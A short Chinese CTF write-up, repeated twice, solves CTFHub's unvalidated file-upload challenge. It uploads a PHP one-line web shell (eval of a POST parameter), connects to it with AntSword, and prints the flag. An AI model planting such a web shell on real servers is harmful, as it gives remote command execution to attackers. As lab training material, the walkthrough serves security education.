CTFHUB技能树之文件上传——无验证
开启靶场,打开链接:
直接上传一句话木马:
<?php @eval($_POST['pass']);?>
成功提交并显示了上传的文件的路径
访问一下该文件触发一句话木马:
看到一片空白是正常的,因为没有写什么函数,比如:
<?php @eval($_POST['pass']);phpinfo();?>
蚁剑直接连接,查找flag文件:
成功得到flag:
ctfhub{f65a7c78ae34c3ff2ac4cf5c}
开启靶场,打开链接:
直接上传一句话木马:
<?php @eval($_POST['pass']);?>
成功提交并显示了上传的文件的路径
访问一下该文件触发一句话木马:
看到一片空白是正常的,因为没有写什么函数,比如:
<?php @eval($_POST['pass']);phpinfo();?>
蚁剑直接连接,查找flag文件:
成功得到flag:
ctfhub{f65a7c78ae34c3ff2ac4cf5c}